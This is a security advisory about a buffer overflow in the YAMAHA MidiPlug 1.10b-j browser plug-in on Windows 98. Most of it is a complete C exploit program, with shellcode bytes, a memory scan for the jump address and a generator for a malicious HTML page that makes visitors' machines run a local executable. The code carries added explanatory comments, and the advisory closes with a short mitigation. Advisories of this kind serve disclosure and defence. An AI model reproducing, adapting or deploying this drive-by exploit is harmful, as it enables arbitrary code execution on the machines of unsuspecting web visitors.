COMMAND

    MidiPlug

SYSTEMS AFFECTED

    YAMAHA MidiPlug 1.10b on IE4/5 Windows98J

PROBLEM

    The MIDI plug-in program "YAMAHA MidiPlug 1.10b-j" for Windows IE4/5
    contains a buffer overflow bug.  If a long "TEXT" variable is
    specified in the EMBED tag, a buffer overflow occurs.  If an attacker
    places the exploit on a web page, the visitor's host will be
    compromised by arbitrary instructions written in the "TEXT" variable.

    Exploit:

        http://shadowpenguin.backsection.net/toolbox.html#no051

    This exploit generates an HTML file that contains the exploit.  The
    HTML file executes "c:\windows\welcome.exe" on the victim host.
    This was tested on Windows 98 (Japanese).

    /*=============================================================================
       YAMAHA MidiPLUG 1.10b-j for Windows98 IE4.0/5.0 exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguin@backsection.net)
      =============================================================================
    */
    
    #include    <stdio.h>
    #include    <stdint.h>
    #include    <windows.h>
    
    #define     MAXBUF          700     /* size of buf: the TEXT attribute value main() writes */
    #define     RETADR          256     /* offset in buf where main() stores the address from search_mem() */
    
    /* (start, end) address pairs that main() hands to search_mem() in
       order; the list is terminated by the 0,0 pair.  These are fixed
       values for the advisory's test platform (Windows 98 Japanese); nothing
       in this listing checks that they are readable on the running host. */
    unsigned int mems[]={
    0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
    0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
    0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
    0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
    0xbffc9000,0xbffe3000,0,0};
    
    /* Raw payload bytes (89 values, the last being 0x00) that main() copies
       to the start of buf with strlen()/memcpy(); the trailing 0x00 ends the
       string and leaves room in the 200-byte array for main() to strcat()
       cmdbuf onto it.  The byte values are not decoded in this listing. */
    unsigned char exploit_code[200]={
    0x90,0xEB,0x50,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
    0x4B,0x90,0x88,0x23,0xB8,0x50,0x57,0xF7,0xBF,0x80,
    0xc4,0x20,0xFF,0xD0,0x43,0x90,0xB2,0xE0,0x90,0x28,
    0x13,0x28,0x53,0x01,0x28,0x53,0x02,0x28,0x53,0x03,
    0x28,0x53,0x04,0x28,0x53,0x05,0x53,0x50,0x32,0xE4,
    0x83,0xC3,0x06,0x90,0x88,0x23,0xB8,0x28,0x4E,0xF7,
    0xBF,0x80,0xc4,0x20,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
    0x90,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
    0x90,0xEB,0xFD,0xE8,0xAB,0xFF,0xFF,0xFF,0x00
    };
    
    /* String that main() appends to exploit_code with strcat() before the
       copy into buf (29 characters; 88 + 29 + 1 fits in the 200-byte array). */
    unsigned char cmdbuf[200]="MSVCRT.DLL.SYSTEM.WELCOME.EXE";
    
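    /*
     * Scan the byte range [st, ed) for the first position p where
     * p[0]==c1 and p[1]==c2 and return that position as a 32-bit value.
     * A match whose address has a zero in any of its four bytes is skipped,
     * because main() stores the returned value inside buf and then prints
     * buf with "%s", where a zero byte would end the string early.
     *
     * fp is accepted for compatibility with the existing call site in
     * main() but is not used.  st and ed must delimit memory this process
     * can read; no check is made here.  Returns 0 when the range is empty
     * or holds no acceptable match.
     *
     * Both bytes of a match must lie inside [st, ed): the loop runs while
     * p+1 < ed, which also removes the one-byte read past ed that the
     * previous "p < ed" loop performed on its last iteration.
     */
    unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                    unsigned char c1,unsigned char c2)
    {
        unsigned char   *p;
        unsigned int    adr;
    
        (void)fp;   /* unused; kept so the call in main() is unchanged */
    
        if (ed <= st) {
            return(0);
        }
        for (p = st; p + 1 < ed; p++) {
            if (p[0] != c1 || p[1] != c2) {
                continue;
            }
            adr = (unsigned int)(uintptr_t)p;
            /* Any zero byte in the address disqualifies the candidate. */
            if ((adr & 0xff) == 0 || ((adr >> 8) & 0xff) == 0 ||
                ((adr >> 16) & 0xff) == 0 || ((adr >> 24) & 0xff) == 0) {
                continue;
            }
            return(adr);
        }
        return(0);
    }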
    /*
     * Entry point.  Writes argv[1] as an HTML file containing an EMBED tag
     * whose TEXT attribute value is buf (MAXBUF bytes): exploit_code with
     * cmdbuf appended at offset 0, the address returned by search_mem() at
     * offset RETADR, and 0x90 everywhere else.
     *
     * Returns FALSE (0) both on success and when fopen() fails, so the exit
     * status cannot distinguish the two; the usage error and the
     * "Can not find jmp code" case exit(1).
     *
     * Declared without a return type (pre-C99 implicit int) and uses
     * exit/strcat/memcpy/strlen/memset although only <stdio.h> and
     * <windows.h> are included; presumably <windows.h> pulls in their
     * declarations on the original toolchain — verify when rebuilding.
     */
    main(int argc,char *argv[])
    {
        FILE                    *fp;
        unsigned int            i,ip;
        unsigned char           buf[MAXBUF];
    
        if (argc<2){
            printf("usage %s output_htmlfile\n",argv[0]);
            exit(1);
        }
        /* Silent on failure: no message, and FALSE is also the success value. */
        if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
        fprintf(fp,"<HTML><EMBED\nTYPE=\"audio/midi\"\nWIDTH=150\nHEIGHT=40\nAUTOSTART=TRUE\nTEXT=\"");
        /* Try each (start,end) pair in mems[] until search_mem() returns a
           non-zero address; the 0,0 terminator ends the search via exit(1)
           (with fp still open).  fp is passed through but search_mem()
           never uses it. */
        for (i=0;;i+=2){
            if (mems[i]==0){
                printf("Can not find jmp code.\n");
                exit(1);
            }
            if ((ip=search_mem(fp,(unsigned char *)mems[i],
                (unsigned char *)mems[i+1],0xff,0xe0))!=0) break;
        }
        printf("Jumping address : %x\n",ip);
        /* Fill buf with 0x90, then store ip low byte first at RETADR. */
        memset(buf,0x90,MAXBUF);
        buf[RETADR  ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
        /* Modifies the global exploit_code in place: 88 + 29 + 1 bytes,
           within its 200-byte array.  memcpy then copies strlen() bytes,
           i.e. everything before the 0x00, so no zero byte lands in buf. */
        strcat(exploit_code,cmdbuf);
        memcpy(buf,exploit_code,strlen(exploit_code));
        /* BUG: buf has MAXBUF elements (indices 0..MAXBUF-1); this writes
           one byte past the end of the array.  The "%s" below relies on
           that stray zero to stop after exactly MAXBUF bytes, so the
           output length depends on undefined behaviour and on the stack
           layout of this frame rather than on the program's logic. */
        buf[MAXBUF]=0;
        fprintf(fp,"%s\"\n>\n</HTML>",buf);
        fclose(fp);     /* return value unchecked; a write error is not reported */
        printf("%s created.\n",argv[1]);
        return FALSE;
    }

SOLUTION
    
    If the "execution of ActiveX controls and plug-ins" setting is turned
    to "invalid" (disabled), you can avoid this problem.  The "Display
    dialog box" mode is also vulnerable: the overflow occurs without the
    dialog-box warning if the file being opened is stored on the local
    disk and is opened from there.